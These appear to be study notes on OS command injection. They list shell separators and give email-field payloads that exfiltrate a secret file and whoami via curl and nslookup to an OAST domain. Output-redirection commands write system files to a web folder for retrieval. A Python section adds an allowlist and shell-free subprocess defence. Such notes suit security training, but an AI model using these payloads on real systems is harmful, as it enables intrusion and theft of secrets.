OS Cmd Injection

Using separators to inject commands

 &&
 &
 ||
 |
 ;
 `
 '
 "
 0x0a
 \n

Feedback injection in mail

email=carlos@exam.net||curl+`whoami`.OASTIFY.COM||

||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||

email=peanut2019@nuts.net||nslookup+`whoami`.OASTIFY.COM||
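
The defensive counterpart to the payloads above, as an added example that is not part of the original notes: validate the email against an allowlist and pass it to the child process as a single argv element with no shell. The function names, the regex and the echo-style child process are assumptions for illustration; the sample payload is the first one above, URL-decoded.

```python
import re
import subprocess
import sys

# Conservative allowlist for the address; anything else is rejected outright.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Separators from the list on this page, plus "$(" as used in the second payload.
# Used only to report why a value was rejected, never as the filter itself.
SEPARATORS = ["&&", "||", "&", "|", ";", "`", "'", '"', "\n", "$("]


def found_separators(value):
    """Return the listed separators that occur in value (for logging/alerting)."""
    return [s for s in SEPARATORS if s in value]


def validate_email(value):
    """Return value if it matches the allowlist, otherwise raise ValueError."""
    if not EMAIL_RE.fullmatch(value):
        raise ValueError(f"rejected email, separators seen: {found_separators(value)}")
    return value


def run_without_shell(arg):
    """Pass arg as one argv element with no shell; the child echoes it back.

    The child here is a stand-in (assumption) for whatever program the
    application really calls, such as a mail client.
    """
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", arg]
    return subprocess.run(child, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed sample input: the first payload above with '+' decoded to a space.
    payload = "carlos@exam.net||curl `whoami`.OASTIFY.COM||"
    print(validate_email("carlos@exam.net"))
    try:
        validate_email(payload)
    except ValueError as exc:
        print(exc)
    # Even unvalidated, the argv form delivers the string literally: no shell
    # parses the || or the backticks, so nothing is executed.
    print(run_without_shell(payload) == payload)
```

The allowlist is the primary control and the argv call is the backstop; the separator list is only for log context, since blocklists of metacharacters are easy to miss entries in.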

Output redirection

If OS command injection is identified but a filter prevents more complex command injection, attempt to redirect the output to a writable folder. Identify a path traversal vulnerability that allows reading of files only in the current web app.

Identify the working directory by redirecting the output of the pwd command to output.txt, then append the stdout of every subsequent bash command to the same file.

||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||

Get the output data

GET /image?filename=output.txt HTTP/2
